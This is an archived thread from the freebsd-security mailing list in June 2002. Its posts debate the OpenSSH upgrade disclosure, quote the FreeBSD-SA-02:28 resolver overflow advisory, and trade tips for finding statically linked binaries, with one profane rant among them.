2002 19:00:42 -0400 Reply-To: myraq@mgm51.com From: "MikeM" To: freebsd-security@FreeBSD.ORG Subject: Re: Users of FreeBSD releases should upgrade OpenSSH too (Was: The "race" that Theo sought to avoid...) Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/26/2002 at 12:35 PM Brett Glass wrote: >At 12:30 PM 6/26/2002, Andrew Kenneth Milton wrote: > >>However their signal to noise ratio is far better than yours. > >In your opinion. In any event, I'm responsible enough to >emit the signal, and to do so promptly. ... ============= ... and repetitively, ad nauseam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:30:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from router.drapple.com (12-225-0-33.client.attbi.com [12.225.0.33]) by hub.freebsd.org (Postfix) with ESMTP id 7E70537B9B3; Wed, 26 Jun 2002 16:05:11 -0700 (PDT) Received: from work.drapple.com (work [192.168.1.10]) by router.drapple.com (8.9.3/8.9.3) with ESMTP id PAA00906; Wed, 26 Jun 2002 15:14:38 -0700 (PDT) (envelope-from mark@work.drapple.com) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Wed, 26 Jun 2002 15:13:59 -0700 (PDT) From: Mark Hartley To: Robert Watson Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: freebsd-security@FreeBSD.ORG, "H. Wade Minter" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 26-Jun-02 Robert Watson wrote: > > On Wed, 26 Jun 2002, H. Wade Minter wrote: > >> So am I correct in assuming that this fix requires a complete system >> rebuild (make buildworld) as opposed to just rebuilding a particular >> module? > > You will catch most applications simply by rebuilding libc and > reinstalling. Unfortunately, some applications are statically linked, and > they must be individually relinked against the new libc and reinstalled. > Since there are a moderate number of statically linked applications that > use DNS, the easiest directions simply involved rebuilding the entire > system (especially given modern system speed). Once the binary updates > are available, there will be a list of the affect binaries if you want to > take a more selective approach. > > Robert N M Watson FreeBSD Core Team, TrustedBSD Projects > robert@fledge.watson.org Network Associates Laboratories > > Are there other common applications (not rebuilt by the world) that many of us are likely to be running which are going to need to be rebuilt (i.e. Apache, pop3 servers, db servers, etc)? I'm not really sure how to even know if an application would be statically linked against libc. Maybe someone with a clue could post some instructions on how to check out if an app is statically linked against libc, then we could test our own apps and rebuild as needed. Anyone have an easy way that we can tell? Thanks. Mark. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:37: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id C7D9B37BAEF for ; Wed, 26 Jun 2002 16:09:05 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1088) id D8F4BAE163; Wed, 26 Jun 2002 15:39:19 -0700 (PDT) Date: Wed, 26 Jun 2002 15:39:19 -0700 From: Dave To: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626223919.GA31673@elvis.mu.org> References: <20020626121754.F8071@mail.seattleFenix.net> <200206261919.g5QJJLLI018466@cvs.openbsd.org> <20020626202057.GA7152@zot.electricrain.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626202057.GA7152@zot.electricrain.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To whom it may concern on the list, Shut the fuck up, you bunch of belligerent, whiney dorks. No one gives a rat's ass if you get hacked. Actually, I spoke too soon, someone must care, since *someone* already told you to fucking upgrade. Someone call the goddam Guinness Book, we've assembled the largest group of crybabies in history. And the absolutely stunning thing is that after I post this, the bitching will grow. Hypocrisy > * To upgrade or not to upgrade, that is the question: Whether 'tis nobler in the mind to suffer The slings and arrows of script kiddies, Or to take arms against a sea of hostile dorks, And by opposing end them? To reboot: to shutdown; No more -a little slice of reality p.s. Chris, this was not a post directed at you in particular. Chris Doherty (chris-freebsd@randomcamel.net) wrote: > At some point, Theo de Raadt said: > > I've barely slept in a week. > > get some rest. > > > So many of you are being totally unreasonable people. > > well. > > "Upgrade now." > > "What versions are vulnerable?" > > "Upgrade now." > > "*sigh* Okay, I'll upgrade my 40 production machines." > > "Okay, the version in -stable is unaffected. Oh yeah, and even if you're > running a vulnerable version, set 'ChallengeResponseAuthentication no' and > you'll be fine." > > people aren't being unreasonable. they just wasted a lot of time upgrading > to a new version of software, when in reality probably 95% of cases are > either not vulnerable or can be secured with a simple configuration file > change (I made that number up, of course, but at least on this list it > doesn't seem out of proportion). > > for myself with my one machine, I'm just annoyed. if I had gone through > this bullshit on 40 machines, when I could have just modified a config > file, I'd be pissed, and rightfully so. > > but, *shrug*. I'll not give such credence to vague warnings in the > future--lesson learned. > > Chris > > > ------------------------------- > Chris Doherty > chris [at] randomcamel.net > > "I think," said Christopher Robin, "that we ought to eat > all our provisions now, so we won't have so much to carry." > -- A. A. Milne > ------------------------------- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Dave McKay dave@mu.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:42:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id CC7DE37B7DE for ; Wed, 26 Jun 2002 16:10:19 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA15615; Wed, 26 Jun 2002 15:18:13 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626151157.02193340@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 15:17:59 -0600 To: "H. Wade Minter" From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: freebsd-security@freebsd.org In-Reply-To: <20020626164206.P57680-100000@bunning.skiltech.com> References: <4.3.2.7.2.20020626143023.022716c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:42 PM 6/26/2002, H. Wade Minter wrote: >I wouldn't think that ports or packages that don't statically link a >resolver would need to be recompiled. The way I read it, if they link statically to libc and use the resolution code there, they can be hit. But, again, it may be possible to defuse the bug without tearing the whole system apart. After all, if resolv.conf points the query at a locally running copy of, say, BIND or djbdns, and the daemon blocks the exploit, you're safe. Same if you query a domain name server (on the same host or not) and *it* blocks the exploit. So, fixing the problem might be as simple as turning on named and modifying resolv.conf. The announcement didn't mention this as a possible workaround. Would it work? --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:50:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 346CC37BB2F for ; Wed, 26 Jun 2002 16:10:22 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15049; Wed, 26 Jun 2002 14:37:46 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626143023.022716c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 14:37:27 -0600 To: "H. Wade Minter" , freebsd-security@freebsd.org From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020626152504.Q45972-100000@bunning.skiltech.com> References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:26 PM 6/26/2002, H. Wade Minter wrote: >So am I correct in assuming that this fix requires a complete system >rebuild (make buildworld) as opposed to just rebuilding a particular >module? Worse than that. Every package or port must be reinstalled or rebuilt too. Ditto everything you've built from source. Basically, the entire system must be ripped up by the roots. This is scary. There may be one mitigating factor, though. Suppose you block direct DNS to and from the outside world, allowing your systems to resolve names only through a DNS server on your own network that you know is safely patched. Will this hold off the hordes at the gates? Or is there a way for a malicious response to sneak through anyway (as with DNS cache poisoning)? Also, is the DNS cache in Squid vulnerable? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:56: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id 0D81A37BC4C for ; Wed, 26 Jun 2002 16:12:48 -0700 (PDT) Received: (qmail 68896 invoked by uid 3338); 26 Jun 2002 22:12:44 -0000 Date: Wed, 26 Jun 2002 18:12:43 -0400 From: Travis Cole To: "Jacques A. Vidrine" Cc: Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) Message-ID: <20020626221240.GB58339@ainaz.pair.com> References: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <20020626152613.GD65700@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626152613.GD65700@madman.nectar.cc> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 10:26:13AM -0500, Jacques A. Vidrine wrote: > On Wed, Jun 26, 2002 at 11:10:44AM -0400, Mike Tancsa wrote: > > OK, but 2.9.9... is that really the same as FreeBSD's > > > > SSH-1.99-OpenSSH_2.9 FreeBSD localisations 20020307 > > No, 2.9.9 is vulnerable; FreeBSD's 2.9 is not. > > [snip] > > This would imply there is a work around, but the talk before hand > [snip] > deraadt> Bullshit. > > I know. I think people reading this list already know my opinion on > the issue. I'm just happy that it's all out in the open now. I think Theo had good reasons for not talking about the work around. Had he mentioned either version numbers or ChallengeResponseAuthentication it would have immediately tipped off the blackhats. The most major change between 2.9 and 2.9.9 was the ChallengeResponse stuff. Thats like 400 lines of code. That makes the game much easier for the blackhats. And even though the workaround is very quick to apply, we all know its not always that simple. It takes time for that sort of information to spread, and you can always run out and change configurations immediately. And what if you actualy use ChallengeResponseAuthentication? If they had told us about ChallengeResponse earlier, then anyone who depended on ChallengeResponse would be screwed. -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17: 3:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 0C36137BBD2; Wed, 26 Jun 2002 16:11:46 -0700 (PDT) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g5QNBiL17308; Wed, 26 Jun 2002 17:11:44 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id A680123AA8; Wed, 26 Jun 2002 17:11:44 -0600 (MDT) Date: Wed, 26 Jun 2002 17:11:44 -0600 From: "David G . Andersen" To: Brian Behlendorf Cc: Robert Watson , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020626171144.A27616@cs.utah.edu> References: <20020626152851.Q310-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org>; from brian@hyperreal.org on Wed, Jun 26, 2002 at 03:29:45PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If it's statically linked, the odds are great that it uses libc. Use 'file' to see how it's linked: 261 eep:ron/data> file /bin/sh /bin/sh: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped 262 eep:ron/data> file /usr/bin/true /usr/bin/true: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped -Dave Brian Behlendorf just mooed: > On Wed, 26 Jun 2002, Robert Watson wrote: > > You will catch most applications simply by rebuilding libc and > > reinstalling. Unfortunately, some applications are statically linked, and > > they must be individually relinked against the new libc and reinstalled. > > Sorry for the newbie question here, but is there a way to programmatically > determine which binaries on a system static-linked libc? I tried "nm" but > that needs non-stripped executables... > > Brian > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17: 7:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id 1A92337BCF0 for ; Wed, 26 Jun 2002 16:15:00 -0700 (PDT) Received: (qmail 58293 invoked by uid 3338); 26 Jun 2002 21:28:14 -0000 Date: Wed, 26 Jun 2002 17:28:14 -0400 From: Travis Cole To: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626212812.GA55744@ainaz.pair.com> References: <20020626121754.F8071@mail.seattleFenix.net> <200206261919.g5QJJLLI018466@cvs.openbsd.org> <20020626202057.GA7152@zot.electricrain.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626202057.GA7152@zot.electricrain.com> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 01:20:57PM -0700, Chris Doherty wrote: > At some point, Theo de Raadt said: > > I've barely slept in a week. > > for myself with my one machine, I'm just annoyed. if I had gone through > this bullshit on 40 machines, when I could have just modified a config > file, I'd be pissed, and rightfully so. > > but, *shrug*. I'll not give such credence to vague warnings in the > future--lesson learned. Well, the fact is they just released 5600 lines of fixes and such for OpenSSH. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1-vs-openbsd.diff.gz Thats a big patch. And Theo has said there are probably other holes in there. I think I trust him on that. I've watched the OpenBSD and OpenSSH projects for a long time, and because of that I have some idea how things operate. They often fix issues that may or may have lead to a working exploit. They fix bugs. Bugs can cause security holes. OpenSSH 3.4 has a *LOT* of bug fixes. And the PrivSep does reduce the chances of any still existing bugs causing real security issues. http://www.citi.umich.edu/u/provos/ssh/privsep.html Its a good idea to upgrade to 3.4. I've got 300 boxes that will be upgraded soon. Most of them are running pre-3.0 SSH versions. I'm upgrading anyway. -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:10:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id 8D63937BD94 for ; Wed, 26 Jun 2002 16:17:19 -0700 (PDT) Received: (qmail 24879 invoked from network); 26 Jun 2002 22:17:38 -0000 Received: from unknown (HELO notgod.com) (10.5.70.90) by node-216-136-154-51.networks.paypal.com with SMTP; 26 Jun 2002 22:17:18 -0000 Message-ID: <3D1A3D39.8050603@notgod.com> Date: Wed, 26 Jun 2002 15:16:25 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: William Carrel Cc: Jan Lentfer , FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org William Carrel wrote: > If and only if you have ChallengeResponseAuthentication set to "yes" Just to be clear, the default for ChallengeResponseAuthentication is "yes" so you probably meant "If and only if you *don't* have ChallengeResponseAuthentication set to 'no'" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:16:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by hub.freebsd.org (Postfix) with ESMTP id 4409337BDBD; Wed, 26 Jun 2002 16:18:55 -0700 (PDT) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5QNIsBu043006; Wed, 26 Jun 2002 16:18:54 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5QNIrTs042300; Wed, 26 Jun 2002 16:18:54 -0700 (PDT) Date: Wed, 26 Jun 2002 16:18:53 -0700 (PDT) From: Doug Barton To: Brian Behlendorf Cc: Robert Watson , Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> Message-ID: <20020626161125.C42164-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brian Behlendorf wrote: > Sorry for the newbie question here, but is there a way to > programmatically determine which binaries on a system static-linked > libc? I tried "nm" but that needs non-stripped executables... ldd /usr/local/bin/bash ldd: /usr/local/bin/bash: not a dynamic executable file /usr/local/bin/bash /usr/local/bin/bash: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped HTH, Doug -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:18:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id E80E437CABF for ; Wed, 26 Jun 2002 17:12:09 -0700 (PDT) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5R0C8m0029482; Thu, 27 Jun 2002 10:12:08 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206270012.g5R0C8m0029482@drugs.dv.isc.org> To: Brett Glass Cc: security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-reply-to: Your message of "Wed, 26 Jun 2002 13:33:34 CST." <4.3.2.7.2.20020626133115.022a0d30@localhost> Date: Thu, 27 Jun 2002 10:12:08 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Aaargh. This will affect not only more recent systems but > the older 3.x and embedded systems I maintain for people. > There's no patch for these, and in the case of the embedded > systems that use BSD I can't upgrade. > > Any word on whether one can detect and block such attacks > upstream via an IDS or a proxy at the firewall? > > --Brett Glass Provided you are behind a nameserver you trust that reconstructs the answer you should be fine. BIND 9 reconstucts all answers (excluding forwarded UPDATES). BIND 8 forwards some and reconstructs others. Mark > > At 01:08 PM 6/26/2002, FreeBSD Security Advisories wrote: > > >-----BEGIN PGP SIGNED MESSAGE----- > > > >============================================================================ > = > >FreeBSD-SA-02:28.resolv Security Advisor > y > > The FreeBSD Projec > t > > > >Topic: buffer overflow in resolver > > > >Category: core > >Module: libc > >Announced: 2002-06-26 > >Credits: Joost Pol > >Affects: All releases prior to and including 4.6-RELEASE > >Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) > > 2002-06-26 08:44:24 UTC (RELENG_4_6) > > 2002-06-26 18:53:20 UTC (RELENG_4_5) > >FreeBSD only: NO > > > >I. Background > > > >The resolver implements functions for making, sending and interpreting > >query and reply messages with Internet domain name servers. > >Hostnames, IP addresses, and other information are queried using the > >resolver. > > > >II. Problem Description > > > >DNS messages have specific byte alignment requirements, resulting in > >padding in messages. In a few instances in the resolver code, this > >padding is not taken into account when computing available buffer > >space. As a result, the parsing of a DNS message may result in a > >buffer overrun of up to a few bytes for each record included in the > >message. > > > >III. Impact > > > >An attacker (either a malicious domain name server or an agent that > >can spoof DNS messages) may produce a specially crafted DNS message > >that will exploit this bug when parsed by an application using the > >resolver. It may be possible for such an exploit to result in the > >execution of arbitrary code with the privileges of the resolver-using > >application. Though no exploits are known to exist today, since > >practically all Internet applications utilize the resolver, the > >severity of this issue is high. > > > >IV. Workaround > > > >There is currently no workaround. > > > >V. Solution > > > >Do one of the following: > > > >1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 > >or RELENG_4_5 security branch dated after the correction date > >(4.6-RELEASE-p1 or 4.5-RELEASE-p7). > > > >2) To patch your present system: > > > >The following patch has been verified to apply to FreeBSD 4.5 and > >FreeBSD 4.6 systems. > > > >a) Download the relevant patch from the location below, and verify the > >detached PGP signature using your PGP utility. > > > ># fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch > ># fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch > .asc > > > >b) Execute the following commands as root: > > > ># cd /usr/src > ># patch < /path/to/patch > > > >c) Recompile the operating systems as described in > >. > > > >Note that any statically linked applications that are not part of > >the base system (i.e. from the Ports Collection or other 3rd-party > >sources) must be recompiled. > > > >VI. Correction details > > > >The following list contains the revision numbers of each file that was > >corrected in FreeBSD. > > > >Path Revision > > Branch > >- ------------------------------------------------------------------------- > >src/lib/libc/net/gethostbydns.c > > RELENG_4 1.27.2.2 > > RELENG_4_6 1.27.10.1 > > RELENG_4_5 1.27.8.1 > >src/lib/libc/net/getnetbydns.c > > RELENG_4 1.13.2.2 > > RELENG_4_6 1.13.2.1.8.1 > > RELENG_4_5 1.13.2.1.6.1 > >src/lib/libc/net/name6.c > > RELENG_4 1.6.2.6 > > RELENG_4_6 1.6.2.5.8.1 > > RELENG_4_5 1.6.2.5.6.1 > >src/sys/conf/newvers.sh > > RELENG_4_6 1.44.2.23.2.2 > > RELENG_4_5 1.44.2.20.2.8 > >- ------------------------------------------------------------------------- > > > >VII. References > > > > > >-----BEGIN PGP SIGNATURE----- > >Version: GnuPG v1.0.7 (FreeBSD) > > > >iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF > >sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb > >qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 > >ZGTC8pmqfGI= > >=s76v > >-----END PGP SIGNATURE----- > > > >This is the moderated mailing list freebsd-announce. > >The list contains announcements of new FreeBSD capabilities, > >important events and project milestones. > >See also the FreeBSD Web pages at http://www.freebsd.org > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-announce" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:21: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 0B4F137BE90 for ; Wed, 26 Jun 2002 16:21:54 -0700 (PDT) Received: from d1o913.telia.com (d1o913.telia.com [195.252.44.241]) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g5QNLqC25329 for ; Thu, 27 Jun 2002 01:21:52 +0200 (CEST) Received: from falcon.midgard.homeip.net (h53n2fls20o913.telia.com [212.181.163.53]) by d1o913.telia.com (8.8.8/8.8.8) with SMTP id BAA18105 for ; Thu, 27 Jun 2002 01:21:51 +0200 (CEST) Received: (qmail 2092 invoked by uid 1001); 26 Jun 2002 23:21:50 -0000 Date: Thu, 27 Jun 2002 01:21:50 +0200 From: Erik Trulsson To: Brian Behlendorf Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020626232150.GA2052@falcon.midgard.homeip.net> Mail-Followup-To: Brian Behlendorf , freebsd-security@freebsd.org References: <20020626152851.Q310-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 03:29:45PM -0700, Brian Behlendorf wrote: > On Wed, 26 Jun 2002, Robert Watson wrote: > > You will catch most applications simply by rebuilding libc and > > reinstalling. Unfortunately, some applications are statically linked, and > > they must be individually relinked against the new libc and reinstalled. > > Sorry for the newbie question here, but is there a way to programmatically > determine which binaries on a system static-linked libc? I tried "nm" but > that needs non-stripped executables... file(1) should do the trick. Normally everything in /bin and /sbin is statically linked while executables in /usr/bin and /usr/sbin are dynamically linked. Most executables from ports are also dynamically linked. -- Erik Trulsson ertr1013@student.uu.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:23:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id BCFC337BE9B for ; Wed, 26 Jun 2002 16:22:41 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5QNMeDK026778; Wed, 26 Jun 2002 19:22:40 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5QNMeAI026775; Wed, 26 Jun 2002 19:22:40 -0400 (EDT) (envelope-from wollman) Date: Wed, 26 Jun 2002 19:22:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200206262322.g5QNMeAI026775@khavrinen.lcs.mit.edu> To: Brian Behlendorf Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> References: <20020626152851.Q310-100000@yez.hyperreal.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Sorry for the newbie question here, but is there a way to programmatically > determine which binaries on a system static-linked libc? I tried "nm" but > that needs non-stripped executables... Yes for -current, likely not for older systems. In -current, something like: $ ident /sbin/ping | fgrep dns $FreeBSD: src/lib/libc/net/gethostbydns.c,v 1.32 2002/03/22 21:52:28 obrien Exp $ ...tells me that I need to update my `ping' binary. These identification strings are not in the -stable resolver library. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the 